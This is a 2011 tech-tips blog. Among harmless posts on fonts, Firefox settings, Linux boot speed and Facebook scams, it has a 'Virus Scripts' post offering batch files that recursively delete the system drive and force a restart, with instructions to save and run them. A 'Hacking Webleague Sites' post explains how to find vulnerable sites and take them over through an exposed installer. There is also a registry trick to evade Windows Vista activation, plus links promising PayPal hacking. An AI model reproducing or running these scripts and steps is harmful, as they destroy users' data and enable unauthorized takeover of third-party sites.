Techie Weblog for Geeks
Welcome Cosmo Cyber Check out Weblinks Page for Great stuff

Thursday, May 26, 2011

Indian Rupee Symbol using Windows Fonts

The India Rupee symbol is now part of the official Unicode standard but for you to type that new currency sign into your favorite word processor or spreadsheet using a regular keyboard, your existing fonts must be updated to the new standard as well.


Microsoft has recently updated all the common fonts the ship with Windows to include support for the new Indian Rupee symbol. Now you can open a document inside Microsoft Word (or notepad), select a popular font family like Arial or Times New Roman, and type the Rupee sign directly.

Update your existing Windows fonts by installing the kb2496898 hotfix available for both Windows Vista and Windows 7. Once installed, this will update the Arial.ttf, Times.ttf, Tahoma.ttf and some of the other font files on your computer with the latest version.

How to Type the Indian Rupee Symbol using Arial

Launch Microsoft Word, change the document font to Arial or Tahoma, and type 20B9 followed by Alt-x. If the 20b9 string is converted into a Rupee symbol, as in the screenshot above, the update has been successfully applied.


~

Monday, May 2, 2011

Boost Nero in XP

Speed up Nero in XP

Go to "administrative tools" in the control panel, and in the "services" list, disable the IMAPI CD-Burning COM service.
(Note: manual setting is not enough it must be disabled) It is the built-in CD-burning capability for windowsXP.
Once it is disabled, Nero will start up much quicker.


~

Saturday, April 16, 2011

Extend Vista

Extend Vista

1) Extend Vista using "slmgr -rearm" method. When you have 1 day remaining to activiate, Go to CommandPrompt & Make sure to press Ctrl + Alt + Enter to access it in Administratve mode.
2) Then type slmgr -rearm and press Enter. In about 45 seconds, you will be prompted to restart your computer. After that, you have succesfully resetted the activation timer to 30 days. This will only work 3 times, giving you 120 days, but… we’re about to change that.
3) Open the registry editor by clicking the Start Pearl and typing regedit in the Search bar.
4) Navigate to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ Currentversion \ SL
5) Right click SkipRearm and modify the value to 1.
6) Click on the Start Pearl and type cmd in the Search bar to access the command Prompt. Make sure you press Ctrl+Alt+Enter to run it in Administrative Mode.
7) Once in Command Prompt, type slmgr -rearm like you would when extending Vista by 30 days. Now you can use Rearm 8 more times, giving you a total of 360 days.


~

Monday, April 4, 2011

Enable Administrator Account

In Windows Vista there is a Built-in Administrator Account in addition to your normal Administrator account that was created. The Built-in Administrator Account is disabled by default.

Certain Programs/Softwares give us trouble in proper installation due to this disable. Even though we run the .exe file of the programs that is to be installed as "Run As Administrator". For proper installation of the programs it is to be enabled.

• Click Start, and type “secpol.msc” in the search area and click Enter.
• You may receive a prompt from UAC, approve/login and proceed.
• In the left list, choose “Local Policies”, then “Security Options
• Set “Accounts: Administrator account status” to Enabled.
• Set “User Account Control: Admin Approval Mode for the Built-in Administrator account” to Disabled.
• Now log-off, and you’ll see a new account named “Administrator” will be available, click on it to login.

Log on to this administrator account. You may delete other user accounts.


~

Wednesday, March 16, 2011

Virus Scripts

1.This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code with .bat extension & Run.


2.The Most Simple Virus To Crush The Window

@Echo off
Del C:\ *.* y

Save The Above Code with .bat extension & Run.


3.The below Code Will Just Restart Ur PC

@echo off shutdown -r -f -t 00

Save The Above Code with .bat extension & Run.


Note: Won't work on Vista or Win7 as you need to bypass UAC.


~

Saturday, March 12, 2011

Tricking Notepad

Tricking Notepad


Here's a really funny way to break Notepad.

This actually works. It will not crash your computer, it just breaks Notepad in that it causes it to display very oddly. No permnent damage comes of the following steps.

1. Open up Notepad (not Wordpad, not Word or any other word processor)
2. Type in this sentence exactly (without quotes): "this app can break"
3. Save the file to your hard drive.
4. Close Notepad
5. Open the saved file by double clicking it.



Instead of seeing your sentence, you should see a series of squares. For whatever reason, Notepad can't figure out what to do with that series of characters and breaks

Explanation: In notepad, any other 4-3-3-5 letter word combo will have the same results.
It is all to do with a limitation in Windows. Text files containing Unicode UTF-16-encoded Unicode are supposed to start with a "Byte-Order Mark" (BOM), which is a two-byte flag that tells a reader how the following UTF-16 data is encoded.

The reason this happens:

1) You are saving to 8-bit Extended ASCII (Look at the Save As / Encoding format)

2) You are reading from 16-bit UNICODE (You guessed it, look at the Save As / Encoding format)

This is why the 18 8-bit characters are being displayed as 9 (obviously not supported by your codepage) 16-bit UNICODE


~

Thursday, February 10, 2011

Increase Youtube Video Views

Increase Youtube Video Views

Click here for the detailed steps.


~

Friday, February 4, 2011

Hacking Webleague Sites

Hacking Webleague Sites

Google for "Powered By Webleague"

Choose a site & select Your Taget Site In A New Page.

For Example You Got This Site

http://www.cyberpranay.de/WebLeague

Now Add "install.php" at the End Of The URL And Hit Enter.

You Get A New Page

http://www.cyberpranay.de/WebLeague/install.php

Enter A New Admin And Password And Submit

Then Type "/Admin/index.php" In The End And Hit Enter

http://www.cyberpranay.de/WebLeague/Admin/index.php

Login With The Admin Account You Created

Go To Settings And Make The Changes.


~

Monday, January 24, 2011

Hack the Paypal

Hack The Paypal

Click here for the complete tutorial.


~

Thursday, January 20, 2011

Firefox Tweaks [Updated]

Firefox Tweaks

Tweak Firefox to Improve the acquire lightning speed.
In the URL bar, type “about:config” and press enter. This will bring up the configuration “menu” where you can change the parameters of Firefox.

Note that these settings are optimized for broadband connections. With as much concurrent requests we’re going to open up with pipelining.

Double Click on the following settings and put in the numbers below - for the true/false booleans - they’ll change when you double click.


browser.tabs.showSingleWindowModePrefs – true
network.http.max-connections – 48
network.http.max-connections-per-server – 16
network.http.max-persistent-connections-per-proxy – 8
network.http.max-persistent-connections-per-server – 4
network.http.pipelining – true
network.http.pipelining.maxrequests – 100
network.http.proxy.pipelining – true
network.http.request.timeout – 300


At last Right-click somewhere on the screen & add a NEW -> Integer. Name it “nglayout.initialpaint.delay” and set its value to “0”. This value is the amount of time the browser waits before it acts on information it receives. Since you’re broadband - it shouldn’t have to wait.


Note: Connot be assured lightning experience but atleast, maximum avilable browsing speed. - Admin


~

Monday, January 17, 2011

Make Your Linux Boot Faster

Make Your Linux Boot Faster

Steps that can make your Linux system boot faster.

Step 1 :
Decide on the unnecessary services and stop them. Try to stop them using the following commands :

chkconfig ip6tables off
chkconfig setroubleshoot off
chkconfig vmware off
chkconfig bluetooth off
chkconfig sendmail off
chkconfig yum-updatesd off


Step 2 :
If the loop-back device is not needed, stop it to save 1 second . Add
ONBOOT=no in its ifcfg file.


Step 3 :
* Kill all splash screens,
* Grub splash (the line that has 'splash image' should be commented in grub.conf),
* Boot splash (edit/ etc/ sysconfig/ init and say No color there) and
* KDE splash (goto the control center and stop it ).

Normally kernel has lots of unnecessary modules that get loaded when the machine starts. Even if you use only the Ethernet, but still the kernel loads the wireless, Blue tooth and router related modules. Disable them or recompile the kernel.

This should save you more than 30 seconds each time u boot your machine. You can tweak your system as per your requirements & save some boot time.

Note: This is configured for PC which has 512 RAM , an Intel dual core processor with RHEL5.1. but holds good for all most all configurations. - Admin (CosmoCyber)


~

Saturday, January 8, 2011

New Facebook Scams (Updated)

New Facebook Scams

Facebook users should be careful about survey scams that are quickly spreading across the social network. Many Facebook users are struggling to clean up their accounts once they’ve been tricked into allowing a third party application to post messages from their profile.

Typical scams include messages that read:

“OMG this girl KILLED herself after her dad posted on her wall: LINK”

“Amazing how such a harmless prank could cause something so bad!: LINK”

“OMG OMG OMG…I cant believe this actually works! Now you really can see who viewed your profile! LINK”





However, by clicking on the link and giving a third-party Facebook application access to their profile, users are helping the scammers to spread the application across their network of friends.

As Per the innocent peoples are using internet, hackers are always interested to do the social engineering on them. Be careful with the email shown below listed come to your Email ID.

Whenever You See All Below Shown Title In Your Email Id Delete Mail Immediately.

12 Most Dangerous All Time Online Scams :-

1. “Help! I’ve been robbed” scam :-
2. Holiday job offers
3. Smishing
4. Hotel and Airport Wi-Fi
5. Suspicious holiday rentals
6. Low price traps
7. Charity scams
8. Grinch-like greetings
9. iPad offer scams
10. Recession scams continue
11. Dangerous holiday downloads


~

Thursday, January 6, 2011

Invisible in Facebook

Be Invisible in Facebook

You may want to chat with someone without knowing others.
Follow the steps for being Invisible to part of your friends, while Visible to Others.

Step 1: Bottom right of the FB window, there is chat option, click on it.

Step 2: Now click on friends list.

Step 3: Create the list named, say [DearOnes].

Step 4: Now see in chat window there will be a small [edit] written in front of [DearOnes List]. click on it.

Step 5: Then add your friends {Whom you want to do chat in private}

Step 6: Refresh your page.

Step 7: See there will be [Other Friends list] and many other if you have created more before, in the chat box.

Step 8: Now see that is there any [green color oval] after every friend list, now u just have to click on that oval to make that friends list offline and you have to do this for every friends list you created, this will turn you offline to them, and the oval now be showing gray color.


~

Sunday, January 2, 2011

Stay anonymous

Stay anonymous while browsing . . Even Hacking.

The Internet has long since become an interactive means of communication. Everyone writes e-mails, and many are making use of online storage sites, blogging, or sharing their views on Web forums. Fortunately, CyberGhost VPN gives users a way to surf anonymously and keep their private information from the eyes of others. CyberGhost VPN provides you with anonymous IP address and encrypts transmissions between you and the Web.


Download it here.

Cyber ghost VPN just happens to be an absolutely reliable firewall. Cyber ghost VPN servers act as stealth and thus prevent your computer can be attacked. Who is invisible on the Internet can not be attacked. In addition, the firewall blocks the VPN server all incoming traffic, thus providing added security.


~